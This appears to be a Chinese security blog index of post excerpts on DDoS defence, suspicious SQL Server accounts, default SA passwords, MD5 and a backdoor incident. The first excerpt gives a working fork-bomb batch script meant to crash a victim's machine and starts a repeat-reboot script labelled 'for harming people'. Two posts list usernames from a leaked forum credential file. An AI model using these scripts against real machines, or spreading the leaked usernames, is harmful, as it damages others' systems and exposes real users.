各种入侵批处理

收集:X.DW's blog
链接:http://hi.baidu.com/hkxdw
第一个:让别人内存OVER(逼他重启)
@echo off
start cmd
%0

就这3行了


第二个:让对方重启指定次数(害人专用)
@echo off
if not exist c:\1.txt echo. >c:\1.txt & goto err1
...

标签:

关于sqldebugger和TsInternetUser系统用户

经常看到网友在网上发帖问sqldebugger、TsInternetUser这个两个用户究竟是什么,是否是正常的系统用户,我觉得不少情况下这个用户都被人利用了,也就是说你可能已经被人入侵了。

TsInternetUser这个用户资料很少,我也没怎么接触过,不知道是怎么生成的,这里主要介绍sqldebugger这个系统用户。安装完sqlserver后,确实可能创建一个sqldebugger用户,如果你没有装sqlserver,系统突然出现这个用户,那一般是被黑了,因为系统出现莫名其妙的用户后,我们会利用搜索引擎查一下,但搜索引擎会告诉我们这个用户确实可能存在,下面有两个方法鉴别这个用户是否已经别人利用了:

标签:

防范DDoS攻击

几乎所有的主机平台都有抵御DDoS的设置。以Linux操作系统为例,其防范技术主要分为三大类,第一类是通过合理配置系统,达到资源最优化和利用最大化,第二类是通过加固TCP/IP协议栈来防范DDoS;第三类是通过防火墙、路由器等过滤网关,有效地探测攻击类型并阻击攻击。
必须明确的是,DDoS攻击在TCP连接原理上是合法的,除非TCP协议重新设计, 明确定义DDoS和其他正常请求有何不同,否则不可能完全阻止DDOS攻击,我们所做的只是尽可能地减轻DDoS攻击的危害。
1.服务器设置
...

标签:

DDoS攻击的检测

下面介绍如何判断服务器是否受到DDoS攻击。使用如下几个简单的步骤可以进行判断。
◆ 最明显的感觉是服务器响应缓慢,一般直接可以从服务器提供的页面显示速度上察觉。
◆ 登录服务器,用“netstat”命令查看,发现服务器有大量等待的TCP连接。
◆ 利用Sniffer、Tcpdump等嗅探工具会发现网络中充斥着大量源地址为假的伪装数据包。
◆ 从ISPtgi控上可以看出服务器的数据流量猛增,造成网络拥塞,服务器甚至不能正常地与外界通信。
...

标签:

国内多家软件公司产品存在安全隐患

作者:烟台 王岗(www.5iadmin.com,QQ:369459071),转载请保留此信息,谢谢。

笔者从事网络管理工作,数月前,应邀对本地一家公司做了一次安全检测,在检测就要结束的时候,在内网用嗅探到了一个SQLServer数据库的SA密码,经该公司的网络管理人员介绍说,该数据库服务器运行了一套软件,在互联网有固定的ip地址,用于与各地子公司交换数据用的,SA密码是软件安装人员设置的,数据库服务器从来没有出现过安全问题。尽管这个SA密码非常复杂,10多位字符,由数字和字母混合组成,但笔者一看到这个SA密码的部分字符,马上想到国内的一家软件公司,会不会这个家软件公司的SA密码设置都是相同的,或者大部分是这个?经过几个月的测试,笔者发现了更为惊人的情况,国内多个软件公司的部分数据库软件产品都存在安全隐患,严重威胁到运行服务器和数据的安全,入侵者可以在短时间内完全控制互联网上大量数据库服务器。SA密码泄露会造成什么危害请参考笔者的这篇文章:http://www.5iadmin.com/post/286.html。由于众所周知的原因,本文没有进行抓图说明,下文仅以字母代表软件公司的名称。
...

标签:

关于MD5摘要算法

MD5的全称是Message-Digest algorithm 5(信息-摘要算法),MD5是一种不可逆的算法,即对生成的密文求逆,对应着无穷个逆。它是在MD4基础上发展而来的,由于MD4可以在几分钟内找到一个冲突,所以很快就被淘汰了。现在,对MD5安全性的问题越来越被重视,甚至有的人就认为:MD5将很快走入历史。那么,事实情况是否如此,MD5真的不安全了吗?
  本文主要探讨几个容易对MD5产生误解的几个问题。
  误区一:碰撞随时可能发生
  如果对MD5摘要算法不了解,便误以为发现碰撞等同于破解,这种误解导致了很多人拼命地去寻找解密算法,最后只能无功而返。碰撞的发生是两个运动的过程,两个被改变的结果存在某种联系就是碰撞。MD5碰撞的发生主要是由于散列算法本身缺陷所导致的,并非MD5所独有,而MD5最大的好处应该是大大降低了这种碰撞被发现的几率和时间周期。只要拖延了足够的时间,MD5的价值也就得到了实现。问题是,随着计算机硬件技术的不断发展,这种靠时间延迟的摘要算法无法解决大大提高了的碰撞几率,也就使这种算法变得危险起来。
...

标签:

一次WinRoute后门攻防实况

我是通过Windows 2000和winroute的代理方式上网。这两天,代理服务器总是出现一些怪现象,运行程序好像很缓慢,而且还会自动重启。难道是中了病毒?还是中了木马?不管怎么样,先去看看再说吧。

来到机房,先把网线拔去。重启后,运行杀毒软件,杀了一遍,并没有发现病毒。随后插上网线,打开IE浏览器,这时奇怪的事情发生了,怎么地址栏里有一些莫名其妙的网址?难道有人用过这台电脑?我觉得事态严重了,可能中了木马。

我起身去倒了杯水,准备一场大战。当我回来的时候,浏览器居然自动打开了 “梦幻西游”的网站,正在下载客户端(还新装了一个下载软件),它居然想用我的代理服务器来挂机打网络游戏!

...

标签:

internetusers用户之谜

同事的一台笔记本电脑装的xp系统,三番几次被人增加系统用户,用户名都internetusers,问问同事的笔记本电脑最近都做什么了,答复是一家软件公司给安装了一套数据库软件,这下基本明白怎么回事了,按了2次重启键,用以前的用户登录到系统,看到了sqlserver的运行图标,打开查询分析其,用sa登录,密码为空,登录成功,没检查是否有木马什么的。

标签:

某个知名技术论坛用户名和密码泄露(第二部分)

这几天在搜索资料时,通过快照发现一个保存大量用户名和md5密码的文件,应该是某个技术论坛的用户和密码,下面是部分用户名,如果有你常用的id,而且你有一码行天下的习惯,那就需要注意了,有可能被人社工到你的其他密码。

Adrianlu
adriano
adriit
adrion
ads__23
ads7408
adsir_cao
ADSL
adsl123321
adsl123zxh
...

标签:

某个知名技术论坛用户名和密码泄露(第一部分)

这几天在搜索资料时,通过快照发现一个保存大量用户名和md5密码的文件,应该是某个技术论坛的用户和密码,下面是部分用户名,如果有你常用的id,而且你有一码行天下的习惯,那就需要注意了,有可能被人社工到你的其他密码。

8149801
8156
8160603
8162ajian
8163959
8170138
8171459
8182838485
8195159
8195426
...

标签: